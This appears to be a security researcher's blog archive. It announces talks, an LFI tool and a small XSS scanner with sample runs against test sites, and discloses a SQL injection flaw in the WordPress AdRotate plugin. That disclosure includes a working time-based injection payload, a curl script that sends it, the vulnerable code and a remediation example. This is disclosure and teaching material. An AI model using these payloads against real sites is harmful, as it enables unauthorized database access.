Tuesday, May 28, 2013

sqlmap - Under the Hood

You can find slides for my talk "sqlmap - Under the Hood" held at PHDays 2013 conference (Russia / Moscow 23rd–24th May 2013) here:

Tuesday, April 9, 2013

Panoptic


Panoptic is an open source penetration testing tool that automates the process of searching for and retrieving the content of common log and configuration files through an LFI vulnerability. The official introductory post can be found here. Also, you can find a sample run here.

The tool was made in collaboration with Roberto Salgado (@LightOS), and I have to say that he is responsible for the idea itself.

Monday, October 29, 2012

Spot the Web Vulnerability

You can find slides for my talk "Spot the Web Vulnerability" at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) here:

Tuesday, June 5, 2012

Data Retrieval over DNS in SQL Injection Attacks

You can find the paper titled "Data Retrieval over DNS in SQL Injection Attacks", written and presented at the PHDays 2012 conference (Russia / Moscow 30th–31st May 2012), here:

DNS exfiltration using sqlmap

You can find slides (together with a link to the video presentation) for my talk "DNS exfiltration using sqlmap" held at the PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) here:

Monday, November 14, 2011

WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability

# Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability
# Date: 2011-11-8
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip
# Version: 3.6.6 (tested)
# Note: parameter $_GET["track"] has to be Base64 encoded

---
PoC
---
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj

e.g.
#!/bin/bash
# The `track` parameter is Base64-decoded by the plugin, so the payload is encoded first
payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=$(printf '%s' "$payload" | base64 -w 0)
curl "http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded"

---------------
Vulnerable code
---------------

if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = base64_decode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
    $bannerurl = $wpdb->get_var($wpdb->prepare("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = '".$ad."' LIMIT 1;")); //wrong (mis)usage of wpdb->prepare()

p.s. tried to contact the author and the WordPress team, but without any luck
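The defect above is that the decoded, user-controlled `$ad` is concatenated into the SQL string before `$wpdb->prepare()` ever sees it, so there is nothing left for `prepare()` to escape. The following is an added example (not the plugin's code) showing the same lookup with the value passed as a placeholder argument and validated first; it assumes the usual WordPress `$wpdb` global and the `$prefix` variable used in the snippet above.

```php
<?php
// Added example, not AdRotate's code: the same lookup written so that
// $wpdb->prepare() actually parameterises the user-controlled value.
// Assumes the WordPress $wpdb global and the $prefix variable from the snippet above.

if (isset($_GET['track']) && $_GET['track'] !== '') {   // && instead of OR: no access to an unset index
    // Strict mode makes base64_decode() return false on malformed input instead of guessing.
    $meta = base64_decode($_GET['track'], true);
    if ($meta === false) {
        wp_die('Invalid tracking token');
    }

    $parts = explode('-', $meta);
    if (count($parts) !== 3) {
        wp_die('Invalid tracking token');
    }
    list($ad, $group, $block) = $parts;

    // Whitelist the expected shape before the value gets anywhere near SQL.
    if (!ctype_digit($ad)) {
        wp_die('Invalid ad id');
    }

    // WRONG (what the plugin does): $ad is already inside the query string, so
    // prepare() receives a fully formed statement with no placeholders to bind.
    // $sql = $wpdb->prepare("SELECT `link` FROM `{$prefix}adrotate` WHERE `id` = '" . $ad . "' LIMIT 1;");

    // RIGHT: the value travels as a prepare() argument; %d coerces it to an integer.
    $bannerurl = $wpdb->get_var(
        $wpdb->prepare(
            "SELECT `link` FROM `{$prefix}adrotate` WHERE `id` = %d LIMIT 1",
            $ad
        )
    );
}
```

Note that `$prefix` is still interpolated into the table name; that is acceptable only because it is a server-side constant, never request data.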

Saturday, November 5, 2011

Damn Small XSS Scanner (DSXS)

Damn Small XSS Scanner (DSXS) is a fully functional XSS scanner (supporting GET and POST parameters) written in under 100 lines of code.

As for optional settings, it supports an HTTP proxy together with the HTTP header values "User-Agent", "Referer" and "Cookie".

Latest source code can be found here (update: current version is v0.1f - Nov 11th 2011).

p.s. sample run(s) against LEGAL targets:
$ python dsxs.py
Damn Small XSS Scanner (DSXS) < 100 LOC (Lines of Code) #v0.1e
 by: Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)

Usage: dsxs.py [options]

Options:
  --version          show program's version number and exit
  -h, --help         show this help message and exit
  -u URL, --url=URL  Target URL (e.g. "http://www.target.com/page.htm?id=1")
  --data=DATA        POST data (e.g. "query=test")
  --cookie=COOKIE    HTTP Cookie header value
  --user-agent=UA    HTTP User-Agent header value
  --random-agent     Use randomly selected HTTP User-Agent header value
  --referer=REFERER  HTTP Referer header value
  --proxy=PROXY      HTTP proxy address (e.g. "http://127.0.0.1:8080")

$ python dsxs.py -u "http://zero.webappsecurity.com/login1.asp" --data="login=test&password=test&graphicOption=minimum" --random-agent
Damn Small XSS Scanner (DSXS) < 100 LOC (Lines of Code) #v0.1e
 by: Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)

* scanning POST parameter 'login'
 (i) POST parameter 'login' appears to be XSS vulnerable (">...<", outside tags, some filtering))
* scanning POST parameter 'password'
* scanning POST parameter 'graphicOption'

scan results: possible vulnerabilities found

$ python dsxs.py -u "http://xss.progphp.com/xss8.html?input=1" --random-agent
Damn Small XSS Scanner (DSXS) < 100 LOC (Lines of Code) #v0.1e
 by: Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)

* scanning GET parameter 'input'
 (i) GET parameter 'input' appears to be XSS vulnerable ("...", pure text response, no filtering))

scan results: possible vulnerabilities found

$ python dsxs.py -u "http://xss.progphp.com/xss12.html" --data="bar=secret&foo=test"
Damn Small XSS Scanner (DSXS) < 100 LOC (Lines of Code) #v0.1e
 by: Miroslav Stampar (http://unconciousmind.blogspot.com | @stamparm)

* scanning POST parameter 'bar'
* scanning POST parameter 'foo'
 (i) POST parameter 'foo' appears to be XSS vulnerable ("<.'...'.>", inside tag, inside single-quotes, some filtering))

scan results: possible vulnerabilities found

p.p.s. ttyrec console recording: